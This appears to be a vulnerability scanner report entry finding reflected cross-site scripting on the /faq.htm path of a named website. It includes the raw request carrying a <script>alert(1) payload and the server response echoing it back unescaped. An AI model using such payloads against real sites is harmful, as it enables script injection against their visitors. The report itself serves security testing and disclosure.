1. Cross-site scripting (reflected)
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.tonic.to |
| Path: | /faq.htm |
| GET /faq.htm1f5bb<script>alert(1)< Host: www.tonic.to Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 01:54:20 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 69 Couldn't read file faq.htm1f5bb<script>alert(1)< |